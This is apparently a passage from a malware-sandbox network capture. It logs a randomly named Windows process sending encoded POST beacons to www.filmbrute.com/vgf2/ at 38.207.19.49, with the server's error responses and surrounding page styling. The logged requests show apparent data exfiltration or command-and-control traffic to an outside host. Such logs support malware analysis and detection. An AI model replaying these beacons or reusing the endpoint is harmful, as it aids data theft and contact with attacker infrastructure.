                                                  Jul 1, 2024 19:26:47.502068043 CEST372INData Raw: 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 74 65 6d 70 6c 61 74
                                                  Data Ascii: s,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484
                                                  Jul 1, 2024 19:26:47.502079964 CEST1236INData Raw: 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 62 75 79 62 6f 78 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 63 6f 6e 74
                                                  Data Ascii: enter}.container-buybox__content-buybox{display:inline-block;text-align:left}.container-buybox__content-heading{font-size:1D1115px}.container-buybox__content-text{font-size:12px}.container-buybox__content-link{color:#949494}.container-buyb
                                                  Jul 1, 2024 19:26:47.502089977 CEST1236INData Raw: 63 74 2d 75 73 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34
                                                  Data Ascii: ct-us__content-text,.container-contact-us__content-link{font-size:10px;color:#949494}.container-privacyPolicy{text-align:center}.container-privacyPolicy__content{display:inline-block}.container-privacyPolicy__content-link{font-size:10px;color:
                                                  Jul 1, 2024 19:26:47.502103090 CEST1236INData Raw: 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 69 6e 69 74 69 61 6c 3b 6d 61 72 67 69 6e 3a 31 30 25 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 34 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 64 69
                                                  Data Ascii: window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-modal-window__content-text{line-height:1.5em}.cookie-modal-window__close{width:100%;margin:0}.cookie-modal-window__con
                                                  Jul 1, 2024 19:26:47.502115011 CEST672INData Raw: 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75
                                                  Data Ascii: order-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:0;height:0}.switch{position:relative;display:inline-block;width:
                                                  Jul 1, 2024 19:26:47.502125978 CEST1236INData Raw: 69 64 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 37 62 66 66 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 31 70 78 20 23 30 30 37 62
                                                  Data Ascii: ider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:translateX(26px);-ms-transform:translateX(26px);transform:translateX(26px)}body{background-color:#0e162
                                                  Jul 1, 2024 19:26:47.502160072 CEST224INData Raw: 64 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 62 67 2f 61 72 72 6f 77 73 2e 70 6e 67 22 29 20 23 30 65 31 36 32 65 20 6e 6f 2d 72 65 70 65 61 74 20 74 6f 70 20 6c 65 66 74 3b
                                                  Data Ascii: d:url("//img.sedoparking.com/templates/bg/arrows.png") #0e162e no-repeat top left;background-size:94% 640px;flex-grow:1;position:inherit;top:90px;overflow:hidden;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-tran
                                                  Jul 1, 2024 19:26:47.506937027 CEST1236INData Raw: 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 6c 70 7b 6d 69 6e 2d 68 65 69 67 68 74
                                                  Data Ascii: sform:scaleX(-1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.container-content--twot{min-height:720px}.container-content--twot .container-content__contain


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  38192.168.2.76449338.207.19.49806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:26:52.979090929 CEST719OUTPOST /vgf2/ HTTP/1.1
                                                  Host: www.filmbrute.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.filmbrute.com
                                                  Referer: http://www.filmbrute.com/vgf2/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 49 32 37 4f 59 75 2f 43 69 2b 72 64 41 33 4c 73 73 36 79 69 50 71 33 76 74 6a 36 6b 62 66 45 77 62 4e 6f 49 2b 54 62 54 70 69 4c 36 70 59 62 6f 6a 61 41 50 37 4a 54 32 39 72 62 34 73 75 6f 4d 6d 6a 4f 41 4b 51 69 71 58 6c 79 45 4e 6b 43 51 76 61 74 4e 71 65 75 30 6d 37 4b 76 76 64 56 2f 71 6a 79 73 6e 2f 43 57 71 7a 5a 55 43 6f 56 51 31 67 31 43 70 79 38 4a 39 6c 30 6d 38 5a 62 6b 57 67 53 51 6a 51 53 55 34 72 46 51 2b 70 64 77 79 4d 64 66 51 42 32 32 77 49 44 49 68 69 45 4d 2b 58 2f 42 4a 2f 4c 62 56 46 35 6c 6d 42 73 6f 43 6e 41 63 33 56 49 52 38 35 47 72 66 44 4b 70 72 43 37 42 49 6e 35 78 45 78 2f 4d 44 61 46 46 6a 41 3d 3d
                                                  Data Ascii: FTP84=I27OYu/Ci+rdA3Lss6yiPq3vtj6kbfEwbNoI+TbTpiL6pYbojaAP7JT29rb4suoMmjOAKQiqXlyENkCQvatNqeu0m7KvvdV/qjysn/CWqzZUCoVQ1g1Cpy8J9l0m8ZbkWgSQjQSU4rFQ+pdwyMdfQB22wIDIhiEM+X/BJ/LbVF5lmBsoCnAc3VIR85GrfDKprC7BIn5xEx/MDaFFjA==
                                                  Jul 1, 2024 19:26:54.169118881 CEST589INHTTP/1.1 400 Bad Request
                                                  Date: Mon, 01 Jul 2024 17:26:53 GMT
                                                  Server: Apache
                                                  Upgrade: h2
                                                  Connection: Upgrade, close
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Length: 359
                                                  Content-Type: text/html; charset=utf-8
                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 55 91 cd 4a c3 40 10 c7 cf 15 7c 87 34 5e bb a4 25 41 24 26 05 11 0f 3e 80 e0 75 9b 9d 26 8b 9b dd 98 4c fa 61 f1 52 04 2f 7a 15 11 1f a0 17 11 2f 2a e8 e3 b4 d5 9b af e0 66 fb a5 87 65 66 fe b3 bf f9 60 82 3a 53 11 0e 33 b0 12 4c 45 7b 7b 2b 58 5b a0 ac b2 29 20 b5 a2 84 e6 05 60 68 97 d8 25 7b f6 5a 4f 10 33 02 e7 25 ef 85 f6 29 39 39 20 87 2a cd 28 f2 8e 00 db 8a 94 44 90 1a 3a 3e 0a 81 c5 b0 c1 24 4d 21 b4 7b 1c fa 99 ca f1 cf cf 3e 67 98 84 0c 7a 3c 02 62 82 86 c5 25 47 4e 05 29 22 2a 20 6c 35 ac 94 0e 78 5a a6 1b a1 2c 20 37 11 d5 7d 43 a9 4c 23 e4 28 a0 ed 35 bd c0 59 b8 5a 2b 70 68 9c 5a 47 b1 e1 48 db 5a 87 46 67 71 ae 4a c9 48 a4 84 ca fd 1d cf f3 f6 ab 4c 57 cf 44 0a 7e 01 7e cb cb 06 95 74 a9 5f e2 8e fe 27 77 9b 8b 64 6d 89 03 80 09 11 06 48 a8 e0 b1 f4 23 bd 1a e4 46 cd 28 63 5c c6 04 55 e6 bb 2b d2 14 eb 03 8f 13 f4 a5 ca 53 2a 96 dd 02 67 35 70 e0 2c cf a1 dd 6a 76 73 20 b7 da ee e7 f3 66 3e 9e 7c 3f bf cd 5f c6 5f 0f 57 f3 bb eb e9 c7 eb f4 fd 76 f6 74 [TRUNCATED]
                                                  Data Ascii: UJ@|4^%A$&>u&LaR/z/*fef`:S3LE{{+X[) `h%{ZO3%)99 *(D:>$M!{>gz<b%GN)"* l5xZ, 7}CL#(5YZ+phZGHZFgqJHLWD~~t_'wdmH#F(c\U+S*g5p,jvs f>|?__Wvt?{5~E9=g


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  39192.168.2.76449438.207.19.49806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:26:55.629261017 CEST739OUTPOST /vgf2/ HTTP/1.1
                                                  Host: www.filmbrute.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.filmbrute.com
                                                  Referer: http://www.filmbrute.com/vgf2/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 49 32 37 4f 59 75 2f 43 69 2b 72 64 61 58 58 73 71 59 61 69 65 61 33 67 7a 7a 36 6b 53 2f 45 38 62 4e 6b 49 2b 57 6a 44 38 45 62 36 6f 35 72 6f 67 62 41 50 36 4a 54 32 32 4c 61 7a 69 4f 6f 62 6d 6a 43 35 4b 56 61 71 58 6b 57 45 4e 6c 79 51 76 74 78 4b 71 4f 75 32 71 62 4b 68 67 39 56 2f 71 6a 79 73 6e 2f 6d 77 71 7a 42 55 42 59 46 51 7a 46 56 42 79 53 38 4b 33 46 30 6d 32 35 62 67 57 67 54 46 6a 56 79 2b 34 70 4e 51 2b 74 5a 77 79 5a 70 65 46 52 32 77 39 6f 44 65 75 79 63 47 77 6e 33 52 4e 74 57 46 64 6b 46 42 75 58 78 4b 59 46 4d 77 70 45 77 71 34 37 69 64 49 6c 58 63 70 44 2f 5a 46 46 4e 51 62 47 61 6d 4f 49 6b 42 31 37 30 78 63 66 31 51 4f 6e 37 43 2b 2f 48 49 76 50 75 61 30 71 45 3d
                                                  Data Ascii: FTP84=I27OYu/Ci+rdaXXsqYaiea3gzz6kS/E8bNkI+WjD8Eb6o5rogbAP6JT22LaziOobmjC5KVaqXkWENlyQvtxKqOu2qbKhg9V/qjysn/mwqzBUBYFQzFVByS8K3F0m25bgWgTFjVy+4pNQ+tZwyZpeFR2w9oDeuycGwn3RNtWFdkFBuXxKYFMwpEwq47idIlXcpD/ZFFNQbGamOIkB170xcf1QOn7C+/HIvPua0qE=
                                                  Jul 1, 2024 19:26:56.877687931 CEST589INHTTP/1.1 400 Bad Request
                                                  Date: Mon, 01 Jul 2024 17:26:56 GMT
                                                  Server: Apache
                                                  Upgrade: h2
                                                  Connection: Upgrade, close
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Length: 359
                                                  Content-Type: text/html; charset=utf-8
                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 55 91 cd 4a c3 40 10 c7 cf 15 7c 87 34 5e bb a4 25 41 24 26 05 11 0f 3e 80 e0 75 9b 9d 26 8b 9b dd 98 4c fa 61 f1 52 04 2f 7a 15 11 1f a0 17 11 2f 2a e8 e3 b4 d5 9b af e0 66 fb a5 87 65 66 fe b3 bf f9 60 82 3a 53 11 0e 33 b0 12 4c 45 7b 7b 2b 58 5b a0 ac b2 29 20 b5 a2 84 e6 05 60 68 97 d8 25 7b f6 5a 4f 10 33 02 e7 25 ef 85 f6 29 39 39 20 87 2a cd 28 f2 8e 00 db 8a 94 44 90 1a 3a 3e 0a 81 c5 b0 c1 24 4d 21 b4 7b 1c fa 99 ca f1 cf cf 3e 67 98 84 0c 7a 3c 02 62 82 86 c5 25 47 4e 05 29 22 2a 20 6c 35 ac 94 0e 78 5a a6 1b a1 2c 20 37 11 d5 7d 43 a9 4c 23 e4 28 a0 ed 35 bd c0 59 b8 5a 2b 70 68 9c 5a 47 b1 e1 48 db 5a 87 46 67 71 ae 4a c9 48 a4 84 ca fd 1d cf f3 f6 ab 4c 57 cf 44 0a 7e 01 7e cb cb 06 95 74 a9 5f e2 8e fe 27 77 9b 8b 64 6d 89 03 80 09 11 06 48 a8 e0 b1 f4 23 bd 1a e4 46 cd 28 63 5c c6 04 55 e6 bb 2b d2 14 eb 03 8f 13 f4 a5 ca 53 2a 96 dd 02 67 35 70 e0 2c cf a1 dd 6a 76 73 20 b7 da ee e7 f3 66 3e 9e 7c 3f bf cd 5f c6 5f 0f 57 f3 bb eb e9 c7 eb f4 fd 76 f6 74 [TRUNCATED]
                                                  Data Ascii: UJ@|4^%A$&>u&LaR/z/*fef`:S3LE{{+X[) `h%{ZO3%)99 *(D:>$M!{>gz<b%GN)"* l5xZ, 7}CL#(5YZ+phZGHZFgqJHLWD~~t_'wdmH#F(c\U+S*g5p,jvs f>|?__Wvt?{5~E9=g


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  40192.168.2.76449538.207.19.49806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:26:58.166465044 CEST1752OUTPOST /vgf2/ HTTP/1.1
                                                  Host: www.filmbrute.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 1250
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.filmbrute.com
                                                  Referer: http://www.filmbrute.com/vgf2/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 49 32 37 4f 59 75 2f 43 69 2b 72 64 61 58 58 73 71 59 61 69 65 61 33 67 7a 7a 36 6b 53 2f 45 38 62 4e 6b 49 2b 57 6a 44 38 45 54 36 6f 4c 54 6f 69 38 30 50 35 4a 54 32 37 72 61 77 69 4f 6f 47 6d 6a 4c 78 4b 56 65 6c 58 6e 2b 45 58 48 57 51 74 5a 46 4b 6c 4f 75 32 69 37 4b 73 76 64 55 6e 71 6a 69 6f 6e 2f 32 77 71 7a 42 55 42 64 42 51 77 51 31 42 77 53 38 4a 39 6c 30 36 38 5a 62 4d 57 67 4c 56 6a 56 2b 45 34 34 74 51 2b 4a 39 77 33 72 78 65 45 78 32 79 78 49 43 64 75 79 68 63 77 6e 72 6e 4e 73 7a 67 64 6e 56 42 34 78 34 74 48 6b 67 56 7a 47 6b 71 33 37 7a 39 64 33 54 50 6d 42 33 47 41 58 68 57 66 48 75 4f 4a 2b 51 39 33 74 42 4d 46 70 38 6b 4e 58 7a 4d 35 49 50 44 2f 73 61 4a 33 4d 39 46 67 56 6f 4d 46 70 66 55 44 52 38 79 52 5a 58 47 78 44 43 70 69 73 4e 4a 4d 57 65 65 52 78 6f 61 47 32 4b 58 71 77 6f 56 52 77 69 53 59 56 57 42 48 76 69 65 39 6a 38 39 68 46 41 4d 65 50 33 73 4a 6b 52 51 59 5a 46 50 43 4a 78 4d 66 41 65 47 66 72 57 68 56 34 4c 31 30 4d 38 56 30 49 51 47 4c 36 44 77 [TRUNCATED]
                                                  Data Ascii: FTP84=I27OYu/Ci+rdaXXsqYaiea3gzz6kS/E8bNkI+WjD8ET6oLToi80P5JT27rawiOoGmjLxKVelXn+EXHWQtZFKlOu2i7KsvdUnqjion/2wqzBUBdBQwQ1BwS8J9l068ZbMWgLVjV+E44tQ+J9w3rxeEx2yxICduyhcwnrnNszgdnVB4x4tHkgVzGkq37z9d3TPmB3GAXhWfHuOJ+Q93tBMFp8kNXzM5IPD/saJ3M9FgVoMFpfUDR8yRZXGxDCpisNJMWeeRxoaG2KXqwoVRwiSYVWBHvie9j89hFAMeP3sJkRQYZFPCJxMfAeGfrWhV4L10M8V0IQGL6DwsfAOH+ID4y03qdjmTBFDZ8fq1ngfJyn9yRBxT7ON2c02zUAaiCUHFkkYcpSeOZiTrf246XJ2u6erGVEvqK2yS+/AHWjOX3nSxlovkriaqP5Er3P0qjgQmjulX1LI58BZd/DHxGGtyw3M7lR/UzLcmWvLcTTBm6Q/XS+WkGzVY7sE3b5KQFw7cf01DtUsR5+H77kr4DfjSKaGo+1THbHb2zdbUdtCzx+jCE9JVLOQrUMjY8klaIqj9FS4gixSwoufqH/7ZgC5/dFwU4BSci5ggRh1vtkhSmZYaOuE5sKzFyC7mZLE7YhDBVGwyYv/DGwnJ840a5aXeuVpLkIOe0mRjYUQJjtWZepTYasfYlLwoSxtwymKakR6HskolfUcw2YNOPxzWpvCHHwY3o98sP1XxS7JfDwspmcN5lkn1FhnyVTCHuDAnIu9LjofOyJCAAuP627mOTQXfgBe4b+MK93+1aAtViES5kTTkiLOD4hkXvOAUJgBUw1n/6GeiF8/Y1loVm3C31mKZRMVoS9nxZYqkYFMy2Kfojz6RfiwWbNssXjyxh2rUeAgRL7zpXvWIKBMz8F4+y0Yz1vVPpm8QQFo/S+JgxaOLWW5ndwZbWgb3XkvQ2UIQv3LPQIWMDsrbmt9021vE6uBQEGGieP+MRU8MG8Y2yPRjwmGre [TRUNCATED]
                                                  Jul 1, 2024 19:26:59.308974981 CEST589INHTTP/1.1 400 Bad Request
                                                  Date: Mon, 01 Jul 2024 17:26:58 GMT
                                                  Server: Apache
                                                  Upgrade: h2
                                                  Connection: Upgrade, close
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Length: 359
                                                  Content-Type: text/html; charset=utf-8
                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 55 91 cd 4a c3 40 10 c7 cf 15 7c 87 34 5e bb a4 25 41 24 26 05 11 0f 3e 80 e0 75 9b 9d 26 8b 9b dd 98 4c fa 61 f1 52 04 2f 7a 15 11 1f a0 17 11 2f 2a e8 e3 b4 d5 9b af e0 66 fb a5 87 65 66 fe b3 bf f9 60 82 3a 53 11 0e 33 b0 12 4c 45 7b 7b 2b 58 5b a0 ac b2 29 20 b5 a2 84 e6 05 60 68 97 d8 25 7b f6 5a 4f 10 33 02 e7 25 ef 85 f6 29 39 39 20 87 2a cd 28 f2 8e 00 db 8a 94 44 90 1a 3a 3e 0a 81 c5 b0 c1 24 4d 21 b4 7b 1c fa 99 ca f1 cf cf 3e 67 98 84 0c 7a 3c 02 62 82 86 c5 25 47 4e 05 29 22 2a 20 6c 35 ac 94 0e 78 5a a6 1b a1 2c 20 37 11 d5 7d 43 a9 4c 23 e4 28 a0 ed 35 bd c0 59 b8 5a 2b 70 68 9c 5a 47 b1 e1 48 db 5a 87 46 67 71 ae 4a c9 48 a4 84 ca fd 1d cf f3 f6 ab 4c 57 cf 44 0a 7e 01 7e cb cb 06 95 74 a9 5f e2 8e fe 27 77 9b 8b 64 6d 89 03 80 09 11 06 48 a8 e0 b1 f4 23 bd 1a e4 46 cd 28 63 5c c6 04 55 e6 bb 2b d2 14 eb 03 8f 13 f4 a5 ca 53 2a 96 dd 02 67 35 70 e0 2c cf a1 dd 6a 76 73 20 b7 da ee e7 f3 66 3e 9e 7c 3f bf cd 5f c6 5f 0f 57 f3 bb eb e9 c7 eb f4 fd 76 f6 74 [TRUNCATED]
                                                  Data Ascii: UJ@|4^%A$&>u&LaR/z/*fef`:S3LE{{+X[) `h%{ZO3%)99 *(D:>$M!{>gz<b%GN)"* l5xZ, 7}CL#(5YZ+phZGHZFgqJHLWD~~t_'wdmH#F(c\U+S*g5p,jvs f>|?__Wvt?{5~E9=g


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  41192.168.2.76449638.207.19.49806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:27:00.696486950 CEST456OUTGET /vgf2/?FTP84=F0TubYbkra/fLGHNqtnaeYyDjBSRDaIxGedz+B7Iv0bejpDurJsW0bbpyLvpmMVlmiWzO1GtHUuGPki2goMxppGKi6uI7uQ9xVSgz+G1kxpEA95r9Q5H+Hhz7gAx2pLrWkb0si+rio1X&Lb=GFtlIrHx8T50 HTTP/1.1
                                                  Host: www.filmbrute.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:27:01.953816891 CEST1236INHTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:27:01 GMT
                                                  Server: Apache
                                                  Upgrade: h2
                                                  Connection: Upgrade, close
                                                  Vary: Accept-Encoding
                                                  Transfer-Encoding: chunked
                                                  Content-Type: text/html; charset=utf-8
                                                  Data Raw: 32 30 30 30 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 7a 68 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6c 69 67 68 74 20 64 61 72 6b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 66 66 66 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 0d 0a 20 20 20 20 20 20 20 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c [TRUNCATED]
                                                  Data Ascii: 2000<html dir="ltr" lang="zh"> <head> <meta charset="utf-8"> <meta name="color-scheme" content="light dark"> <meta name="theme-color" content="#fff"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title></title> <style>/* Copyright 2017 The Chromium Authors. All rights reserved. * Use of this source code is governed by a BSD-style license that can be * found in the LICENSE file. */ a { color: var(--link-color); } body { --background-color: #fff; --error-code-color: var(--google-gray-700); --google-blue-100: rgb(210, 227, 252); --google-blue-300: rgb(138, 180, 248); --google-blue-600: rgb(26, 115, 232); --google-blue-700: rgb(25, 103, 210); --google-gray-100: rgb(241, 243, 244); --google-gray-300: rgb(218, 220, 224); --google-gray-500: rgb(154, 160, 166); --google-gray-50: rgb(248, 249, 250); --google-gray-600: rgb(128, 134, 139); --google-gray-700: rgb(95, 99, 1 [TRUNCATED]
                                                  Jul 1, 2024 19:27:01.953845024 CEST1236INData Raw: 2d 67 72 61 79 2d 38 30 30 3a 20 72 67 62 28 36 30 2c 20 36 34 2c 20 36 37 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 39 30 30 3a 20 72 67 62 28 33 32 2c 20 33 33 2c 20 33 36 29 3b 20 2d 2d 68 65 61 64 69 6e 67 2d 63 6f 6c 6f 72 3a 20 76
                                                  Data Ascii: -gray-800: rgb(60, 64, 67); --google-gray-900: rgb(32, 33, 36); --heading-color: var(--google-gray-900); --link-color: rgb(88, 88, 88); --popup-container-background-color: rgba(0,0,0,.65); --primary-button-fill-color-active: var(--google-blue-
                                                  Jul 1, 2024 19:27:01.953860044 CEST448INData Raw: 62 6f 64 79 20 7b 20 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 39 30 30 29 3b 20 2d 2d 65 72 72 6f 72 2d 63 6f 64 65 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 67 6f 6f 67 6c
                                                  Data Ascii: body { --background-color: var(--google-gray-900); --error-code-color: var(--google-gray-500); --heading-color: var(--google-gray-500); --link-color: var(--google-blue-300); --primary-button-fill-color-active: rgb(129, 162, 208); --primary-but
                                                  Jul 1, 2024 19:27:01.953871965 CEST1236INData Raw: 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 66 69 6c 6c 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 39 30 30 29 3b 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 66 69 6c 6c 2d 63
                                                  Data Ascii: condary-button-fill-color: var(--google-gray-900); --secondary-button-hover-fill-color: rgb(48, 51, 57); --secondary-button-text-color: var(--google-blue-300); --small-link-color: var(--google-blue-300); --text-color: var(--google-gray-500); }
                                                  Jul 1, 2024 19:27:01.953880072 CEST1236INData Raw: 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 6d 6f 6e 6f 73 70 61 63 65 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 65 6d 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 2e 35 65 6d 3b 20 7d 20 2e 64 65 62 75
                                                  Data Ascii: splay: block; font-family: monospace; font-size: 1.2em; margin-top: 0.5em; } .debugging-title { font-weight: bold; } #details { margin: 0 0 50px; } #details p:not(:first-of-type) { margin-top: 20px; } .secondary-button:active { border-color: w
                                                  Jul 1, 2024 19:27:01.953891993 CEST1236INData Raw: 20 33 32 70 78 3b 20 7d 20 23 65 78 74 65 6e 64 65 64 2d 72 65 70 6f 72 74 69 6e 67 2d 6f 70 74 2d 69 6e 20 6c 61 62 65 6c 20 7b 20 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 20 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6c 75 6d 6e 73 3a 20
                                                  Data Ascii: 32px; } #extended-reporting-opt-in label { display: grid; grid-template-columns: 1.8em 1fr; position: relative; } #enhanced-protection-message { border-radius: 4px; font-size: 1em; margin-top: 32px; padding: 10px 5px; } #enhanced-protection-m
                                                  Jul 1, 2024 19:27:01.953908920 CEST1236INData Raw: 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 63 61 6c 63 28 2e 33 65 6d 20 2b 20 76 61 72 28 2d 2d 70 61 64 64 69 6e 67 29 29 3b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 2d 34 35 64 65 67 29 3b 20 77 69
